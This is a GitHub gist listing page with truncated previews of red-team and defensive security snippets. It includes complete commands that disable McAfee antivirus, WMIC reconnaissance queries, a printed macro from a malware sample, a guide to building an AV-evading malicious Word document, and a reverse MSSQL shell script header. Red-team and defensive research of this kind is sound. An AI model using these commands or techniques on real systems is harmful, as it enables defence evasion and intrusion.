Skip to content

Instantly share code, notes, and snippets.

View C0axx's full-sized avatar

Curtis Ringwald C0axx

71 followers · 109 following
View GitHub Profile
@tegansnyder
tegansnyder / disable mcafee endpoint protection.md
Last active October 29, 2024 13:49
Disable McAffee Endpoint Protection OSX

method 1

sudo /usr/local/McAfee/AntiMalware/VSControl stopoas

alternatively

sudo defaults write /Library/Preferences/com.mcafee.ssm.antimalware.plist OAS_Enable -bool False
sudo /usr/local/McAfee/AntiMalware/VSControl stop
sudo /usr/local/McAfee/AntiMalware/VSControl reload
@xorrior
xorrior / wmic_cmds.txt
Last active May 13, 2025 05:33
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@rsmudge
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created October 23, 2016 00:12
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active May 26, 2025 12:25
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@mackwage
mackwage / windows_hardening.cmd
Last active May 29, 2025 01:31
Script to perform some hardening of Windows OS
:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering.
:: Obligatory 'views are my own'. :)
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key!
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:
@mgeeky
mgeeky / muti-stage-1.md
Last active May 21, 2023 00:24
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property
@xassiz
xassiz / mandros.py
Created March 16, 2018 07:53
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / windows_hardening.cmd
Last active April 23, 2025 10:35
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
@nullbind
nullbind / QuickDumpComputersAndSPN.ps1
Created June 19, 2018 02:08
QuickDumpAllComputerandSPN
# -------------------------------------------
# Function: Get-DomainObject
# -------------------------------------------
# Based on Get-ADObject function from:
# https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1
function Get-DomainObject
{
[CmdletBinding()]
Param(
[Parameter(Mandatory=$false,